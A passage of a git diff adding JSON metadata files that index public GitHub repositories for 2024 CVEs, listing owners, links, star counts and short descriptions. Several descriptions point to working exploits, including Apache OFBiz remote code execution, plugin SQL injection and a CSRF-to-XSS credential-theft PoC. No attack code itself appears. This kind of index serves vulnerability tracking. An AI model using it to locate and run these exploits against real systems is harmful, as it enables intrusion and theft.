"watchers_count": 26, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38475.json b/2024/CVE-2024-38475.json new file mode 100644 index 0000000000..f9d3dd1ea3 --- /dev/null +++ b/2024/CVE-2024-38475.json @@ -0,0 +1,33 @@ +[ + { + "id": 844097919, + "name": "CVE-2024-38475", + "full_name": "p0in7s\/CVE-2024-38475", + "owner": { + "login": "p0in7s", + "id": 33754111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33754111?v=4", + "html_url": "https:\/\/github.com\/p0in7s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0in7s\/CVE-2024-38475", + "description": null, + "fork": false, + "created_at": "2024-08-18T11:30:50Z", + "updated_at": "2024-08-29T13:31:16Z", + "pushed_at": "2024-08-18T12:27:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38526.json b/2024/CVE-2024-38526.json new file mode 100644 index 0000000000..f0873b6954 --- /dev/null +++ b/2024/CVE-2024-38526.json @@ -0,0 +1,33 @@ +[ + { + "id": 852927724, + "name": "pollypull", + "full_name": "putget\/pollypull", + "owner": { + "login": "putget", + "id": 180568046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180568046?v=4", + "html_url": "https:\/\/github.com\/putget", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/putget\/pollypull", + "description": "CVE-2024-38526 - Polyfill Scanner", + "fork": false, + "created_at": "2024-09-05T17:09:50Z", + "updated_at": "2024-09-05T19:28:09Z", + "pushed_at": "2024-09-05T19:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38537.json b/2024/CVE-2024-38537.json new file mode 100644 index 0000000000..a815b8dfa5 --- /dev/null +++ b/2024/CVE-2024-38537.json @@ -0,0 +1,33 @@ +[ + { + "id": 825357927, + "name": "Detect_polyfill_CVE-2024-38537-", + "full_name": "Havoc10-sw\/Detect_polyfill_CVE-2024-38537-", + "owner": { + "login": "Havoc10-sw", + "id": 72911792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72911792?v=4", + "html_url": "https:\/\/github.com\/Havoc10-sw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Havoc10-sw\/Detect_polyfill_CVE-2024-38537-", + "description": "Here's a Python script that checks if the polyfill.io domain is present in the Content Security Policy (CSP) header of a given web application.", + "fork": false, + "created_at": "2024-07-07T15:06:39Z", + "updated_at": "2024-07-07T16:05:21Z", + "pushed_at": "2024-07-07T16:05:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3867.json b/2024/CVE-2024-3867.json new file mode 100644 index 0000000000..d8476ed686 --- /dev/null +++ b/2024/CVE-2024-3867.json @@ -0,0 +1,33 @@ +[ + { + "id": 797589339, + "name": "CVE-2024-3867", + "full_name": "c4cnm\/CVE-2024-3867", + "owner": { + "login": "c4cnm", + "id": 166544186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166544186?v=4", + "html_url": "https:\/\/github.com\/c4cnm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c4cnm\/CVE-2024-3867", + "description": "This repository shows u some information on this vulnerability, which were found by me.", + "fork": false, + "created_at": "2024-05-08T06:19:05Z", + "updated_at": "2024-05-08T06:33:08Z", + "pushed_at": "2024-05-08T06:33:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38793.json b/2024/CVE-2024-38793.json new file mode 100644 index 0000000000..129b447e7e --- /dev/null +++ b/2024/CVE-2024-38793.json @@ -0,0 +1,33 @@ +[ + { + "id": 844081768, + "name": "CVE-2024-38793-PoC", + "full_name": "ret2desync\/CVE-2024-38793-PoC", + "owner": { + "login": "ret2desync", + "id": 101975136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101975136?v=4", + "html_url": "https:\/\/github.com\/ret2desync", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ret2desync\/CVE-2024-38793-PoC", + "description": "Proof of Concept code for exploitation of CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Authenticated (Contributor+) SQL Injection)", + "fork": false, + "created_at": "2024-08-18T10:26:23Z", + "updated_at": "2024-08-18T18:09:55Z", + "pushed_at": "2024-08-18T10:38:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38816.json b/2024/CVE-2024-38816.json new file mode 100644 index 0000000000..04a66b33fa --- /dev/null +++ b/2024/CVE-2024-38816.json @@ -0,0 +1,95 @@ +[ + { + "id": 860196818, + "name": "cve-2024-38816-demo", + "full_name": "startsw1th\/cve-2024-38816-demo", + "owner": { + "login": "startsw1th", + "id": 112529608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112529608?v=4", + "html_url": "https:\/\/github.com\/startsw1th", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/startsw1th\/cve-2024-38816-demo", + "description": null, + "fork": false, + "created_at": "2024-09-20T02:09:23Z", + "updated_at": "2024-10-21T10:02:09Z", + "pushed_at": "2024-09-20T02:14:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864697611, + "name": "CVE-2024-38816-PoC", + "full_name": "WULINPIN\/CVE-2024-38816-PoC", + "owner": { + "login": "WULINPIN", + "id": 30523752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30523752?v=4", + "html_url": "https:\/\/github.com\/WULINPIN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WULINPIN\/CVE-2024-38816-PoC", + "description": "CVE-2024-38816 Proof of Concept", + "fork": false, + "created_at": "2024-09-28T23:16:23Z", + "updated_at": "2024-10-22T03:46:36Z", + "pushed_at": "2024-09-26T09:46:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 872964642, + "name": "cve-2024-38816", + "full_name": "Galaxy-system\/cve-2024-38816", + "owner": { + "login": "Galaxy-system", + "id": 123049563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123049563?v=4", + "html_url": "https:\/\/github.com\/Galaxy-system", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Galaxy-system\/cve-2024-38816", + "description": null, + "fork": false, + "created_at": "2024-10-15T11:33:13Z", + "updated_at": "2024-10-15T11:33:13Z", + "pushed_at": "2024-10-15T11:33:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38821.json b/2024/CVE-2024-38821.json new file mode 100644 index 0000000000..5edeac022f --- /dev/null +++ b/2024/CVE-2024-38821.json @@ -0,0 +1,33 @@ +[ + { + "id": 880884921, + "name": "cve-2024-38821", + "full_name": "mouadk\/cve-2024-38821", + "owner": { + "login": "mouadk", + "id": 32769487, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32769487?v=4", + "html_url": "https:\/\/github.com\/mouadk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mouadk\/cve-2024-38821", + "description": "cve-2024-38821", + "fork": false, + "created_at": "2024-10-30T14:38:37Z", + "updated_at": "2024-11-14T01:22:38Z", + "pushed_at": "2024-10-30T15:17:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38856.json b/2024/CVE-2024-38856.json new file mode 100644 index 0000000000..f8671734c7 --- /dev/null +++ b/2024/CVE-2024-38856.json @@ -0,0 +1,227 @@ +[ + { + "id": 839631817, + "name": "CVE-2024-38856_Scanner", + "full_name": "securelayer7\/CVE-2024-38856_Scanner", + "owner": { + "login": "securelayer7", + "id": 14994455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14994455?v=4", + "html_url": "https:\/\/github.com\/securelayer7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securelayer7\/CVE-2024-38856_Scanner", + "description": "Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)", + "fork": false, + "created_at": "2024-08-08T02:40:56Z", + "updated_at": "2024-11-26T22:44:35Z", + "pushed_at": "2024-10-02T15:59:28Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache-ofbiz", + "cve-scanning", + "exploit", + "exploitation", + "rce-exploit", + "rce-scanner" + ], + "visibility": "public", + "forks": 11, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840564456, + "name": "CVE-2024-38856", + "full_name": "ThatNotEasy\/CVE-2024-38856", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-38856", + "description": "Perform With Massive Apache OFBiz Zero-Day Scanner & RCE", + "fork": false, + "created_at": "2024-08-10T03:05:34Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-10T03:14:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844163753, + "name": "CVE-2024-38856-ApacheOfBiz", + "full_name": "Praison001\/CVE-2024-38856-ApacheOfBiz", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-38856-ApacheOfBiz", + "description": "Exploit for CVE-2024-38856 affecting Apache OFBiz versions before 18.12.15", + "fork": false, + "created_at": "2024-08-18T15:19:58Z", + "updated_at": "2024-09-02T09:19:33Z", + "pushed_at": "2024-08-18T15:27:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845856356, + "name": "CVE-2024-38856-EXP", + "full_name": "0x20c\/CVE-2024-38856-EXP", + "owner": { + "login": "0x20c", + "id": 25526653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25526653?v=4", + "html_url": "https:\/\/github.com\/0x20c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x20c\/CVE-2024-38856-EXP", + "description": "CVE-2024-38856 Exploit", + "fork": false, + "created_at": "2024-08-22T04:05:02Z", + "updated_at": "2024-09-06T11:18:59Z", + "pushed_at": "2024-08-22T04:19:48Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848488270, + "name": "CVE-2024-38856", + "full_name": "emanueldosreis\/CVE-2024-38856", + "owner": { + "login": "emanueldosreis", + "id": 5330737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5330737?v=4", + "html_url": "https:\/\/github.com\/emanueldosreis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emanueldosreis\/CVE-2024-38856", + "description": "Nuclei template to scan for Apache Ofbiz affecting versions before 18.12.15", + "fork": false, + "created_at": "2024-08-27T21:16:09Z", + "updated_at": "2024-08-28T12:04:31Z", + "pushed_at": "2024-08-28T12:04:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848587568, + "name": "CVE-2024-38856-RCE", + "full_name": "BBD-YZZ\/CVE-2024-38856-RCE", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/CVE-2024-38856-RCE", + "description": "Apache OFBiz CVE-2024-38856", + "fork": false, + "created_at": "2024-08-28T03:17:22Z", + "updated_at": "2024-09-05T11:53:50Z", + "pushed_at": "2024-08-28T06:36:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892921079, + "name": "cve-2024-38856-poc", + "full_name": "XiaomingX\/cve-2024-38856-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-38856-poc", + "description": "CVE-2024-38856 是 Apache OFBiz 中的一个严重漏洞,允许未经身份验证的攻击者在受影响的系统上执行任意代码。 ", + "fork": false, + "created_at": "2024-11-23T03:54:28Z", + "updated_at": "2024-11-23T03:57:31Z", + "pushed_at": "2024-11-23T03:57:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39031.json b/2024/CVE-2024-39031.json new file mode 100644 index 0000000000..3f6b6002f7 --- /dev/null +++ b/2024/CVE-2024-39031.json @@ -0,0 +1,33 @@ +[ + { + "id": 826000412, + "name": "CVE-2024-39031", + "full_name": "toneemarqus\/CVE-2024-39031", + "owner": { + "login": "toneemarqus", + "id": 85018947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85018947?v=4", + "html_url": "https:\/\/github.com\/toneemarqus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toneemarqus\/CVE-2024-39031", + "description": "Stored Cross-Side Scripting (XSS) leads to privilege escalation in SilverPeas social-networking portal", + "fork": false, + "created_at": "2024-07-08T23:21:52Z", + "updated_at": "2024-07-24T04:41:12Z", + "pushed_at": "2024-07-24T04:41:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39069.json b/2024/CVE-2024-39069.json new file mode 100644 index 0000000000..4a14054f9c --- /dev/null +++ b/2024/CVE-2024-39069.json @@ -0,0 +1,33 @@ +[ + { + "id": 826264577, + "name": "CVE-2024-39069", + "full_name": "AungSoePaing\/CVE-2024-39069", + "owner": { + "login": "AungSoePaing", + "id": 76258644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76258644?v=4", + "html_url": "https:\/\/github.com\/AungSoePaing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AungSoePaing\/CVE-2024-39069", + "description": "CVE-2024-39069", + "fork": false, + "created_at": "2024-07-09T11:24:44Z", + "updated_at": "2024-07-09T13:29:18Z", + "pushed_at": "2024-07-09T13:29:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39081.json b/2024/CVE-2024-39081.json new file mode 100644 index 0000000000..76e5ce359a --- /dev/null +++ b/2024/CVE-2024-39081.json @@ -0,0 +1,33 @@ +[ + { + "id": 782335847, + "name": "BLE-TPMS", + "full_name": "Amirasaiyad\/BLE-TPMS", + "owner": { + "login": "Amirasaiyad", + "id": 134613441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134613441?v=4", + "html_url": "https:\/\/github.com\/Amirasaiyad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amirasaiyad\/BLE-TPMS", + "description": "CVE-2024-39081. BLE TPMS data manipulation over bluetooth communication.", + "fork": false, + "created_at": "2024-04-05T05:13:27Z", + "updated_at": "2024-09-18T11:36:16Z", + "pushed_at": "2024-09-18T11:36:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39090.json b/2024/CVE-2024-39090.json new file mode 100644 index 0000000000..21220672be --- /dev/null +++ b/2024/CVE-2024-39090.json @@ -0,0 +1,33 @@ +[ + { + "id": 895097713, + "name": "CVE-2024-39090-PoC", + "full_name": "ghostwirez\/CVE-2024-39090-PoC", + "owner": { + "login": "ghostwirez", + "id": 64195231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64195231?v=4", + "html_url": "https:\/\/github.com\/ghostwirez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ghostwirez\/CVE-2024-39090-PoC", + "description": "This PoC script exploits CVE-2024-39090, a CSRF to Stored XSS vulnerability in PHPGurukul Online Shopping Portal v2.0. It automates CSRF attacks to inject persistent JavaScript payloads, which execute when a privileged user accesses the affected page, enabling actions such as session hijacking or credential theft.", + "fork": false, + "created_at": "2024-11-27T14:55:58Z", + "updated_at": "2024-11-27T14:57:36Z", + "pushed_at": "2024-11-27T14:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39203.json b/2024/CVE-2024-39203.json new file mode 100644 index 0000000000..b1a8c7dce2 --- /dev/null +++ b/2024/CVE-2024-39203.json @@ -0,0 +1,33 @@ +[ + { + "id": 823919362, + "name": "CVE-2024-39203", + "full_name": "5r1an\/CVE-2024-39203", + "owner": { + "login": "5r1an", + "id": 174668848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174668848?v=4", + "html_url": "https:\/\/github.com\/5r1an", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5r1an\/CVE-2024-39203", + "description": "A cross-site scripting (XSS) vulnerability in the Backend Theme. Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.", + "fork": false, + "created_at": "2024-07-04T02:30:17Z", + "updated_at": "2024-07-04T02:30:17Z", + "pushed_at": "2024-07-04T02:30:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39205.json b/2024/CVE-2024-39205.json new file mode 100644 index 0000000000..928f0a57ff --- /dev/null +++ b/2024/CVE-2024-39205.json @@ -0,0 +1,37 @@ +[ + { + "id": 878732098, + "name": "CVE-2024-39205-Pyload-RCE", + "full_name": "Marven11\/CVE-2024-39205-Pyload-RCE", + "owner": { + "login": "Marven11", + "id": 110723864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110723864?v=4", + "html_url": "https:\/\/github.com\/Marven11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marven11\/CVE-2024-39205-Pyload-RCE", + "description": "Pyload RCE with js2py sandbox escape ", + "fork": false, + "created_at": "2024-10-26T01:01:35Z", + "updated_at": "2024-11-20T16:31:08Z", + "pushed_at": "2024-10-26T01:11:57Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "pyload", + "rce" + ], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39210.json b/2024/CVE-2024-39210.json new file mode 100644 index 0000000000..e17a7e3a7b --- /dev/null +++ b/2024/CVE-2024-39210.json @@ -0,0 +1,33 @@ +[ + { + "id": 824474537, + "name": "CVE-2024-39210", + "full_name": "KRookieSec\/CVE-2024-39210", + "owner": { + "login": "KRookieSec", + "id": 43315052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43315052?v=4", + "html_url": "https:\/\/github.com\/KRookieSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KRookieSec\/CVE-2024-39210", + "description": "Best house rental management system Local file contains vulnerability ", + "fork": false, + "created_at": "2024-07-05T08:01:22Z", + "updated_at": "2024-11-09T13:59:02Z", + "pushed_at": "2024-07-05T08:02:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39211.json b/2024/CVE-2024-39211.json new file mode 100644 index 0000000000..182ba20c84 --- /dev/null +++ b/2024/CVE-2024-39211.json @@ -0,0 +1,33 @@ +[ + { + "id": 824057577, + "name": "CVE-2024-39211", + "full_name": "artemy-ccrsky\/CVE-2024-39211", + "owner": { + "login": "artemy-ccrsky", + "id": 33719402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33719402?v=4", + "html_url": "https:\/\/github.com\/artemy-ccrsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/artemy-ccrsky\/CVE-2024-39211", + "description": "CVE-2024-39211", + "fork": false, + "created_at": "2024-07-04T09:24:34Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-08T13:00:44Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3922.json b/2024/CVE-2024-3922.json new file mode 100644 index 0000000000..b7fabc990d --- /dev/null +++ b/2024/CVE-2024-3922.json @@ -0,0 +1,33 @@ +[ + { + "id": 814025007, + "name": "CVE-2024-3922-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3922-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3922-Poc", + "description": "Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-06-12T07:42:10Z", + "updated_at": "2024-06-26T12:02:43Z", + "pushed_at": "2024-06-12T08:03:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39248.json b/2024/CVE-2024-39248.json new file mode 100644 index 0000000000..b62ae86528 --- /dev/null +++ b/2024/CVE-2024-39248.json @@ -0,0 +1,33 @@ +[ + { + "id": 820622884, + "name": "CVE-2024-39248", + "full_name": "jasonthename\/CVE-2024-39248", + "owner": { + "login": "jasonthename", + "id": 19846828, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19846828?v=4", + "html_url": "https:\/\/github.com\/jasonthename", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jasonthename\/CVE-2024-39248", + "description": "Publication for Cross Site Scripting (XSS) in SimpCMS v0.1 - \/SimpCMS\/admin.php", + "fork": false, + "created_at": "2024-06-26T21:06:56Z", + "updated_at": "2024-06-26T21:20:11Z", + "pushed_at": "2024-06-26T21:20:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39250.json b/2024/CVE-2024-39250.json new file mode 100644 index 0000000000..c6d26c739b --- /dev/null +++ b/2024/CVE-2024-39250.json @@ -0,0 +1,33 @@ +[ + { + "id": 828336673, + "name": "CVE-2024-39250", + "full_name": "efrann\/CVE-2024-39250", + "owner": { + "login": "efrann", + "id": 44778301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44778301?v=4", + "html_url": "https:\/\/github.com\/efrann", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efrann\/CVE-2024-39250", + "description": "CVE-2024-39250 TimeTrax SQLi", + "fork": false, + "created_at": "2024-07-13T20:29:31Z", + "updated_at": "2024-08-02T03:18:34Z", + "pushed_at": "2024-07-23T12:28:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39304.json b/2024/CVE-2024-39304.json new file mode 100644 index 0000000000..eee2808a59 --- /dev/null +++ b/2024/CVE-2024-39304.json @@ -0,0 +1,33 @@ +[ + { + "id": 836297653, + "name": "CVE-2024-39304", + "full_name": "apena-ba\/CVE-2024-39304", + "owner": { + "login": "apena-ba", + "id": 113431512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113431512?v=4", + "html_url": "https:\/\/github.com\/apena-ba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apena-ba\/CVE-2024-39304", + "description": null, + "fork": false, + "created_at": "2024-07-31T14:48:57Z", + "updated_at": "2024-08-28T06:24:36Z", + "pushed_at": "2024-07-31T15:09:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39306.json b/2024/CVE-2024-39306.json new file mode 100644 index 0000000000..fe9783451d --- /dev/null +++ b/2024/CVE-2024-39306.json @@ -0,0 +1,33 @@ +[ + { + "id": 836301150, + "name": "CVE-2024-39306", + "full_name": "apena-ba\/CVE-2024-39306", + "owner": { + "login": "apena-ba", + "id": 113431512, + "avatar_url": 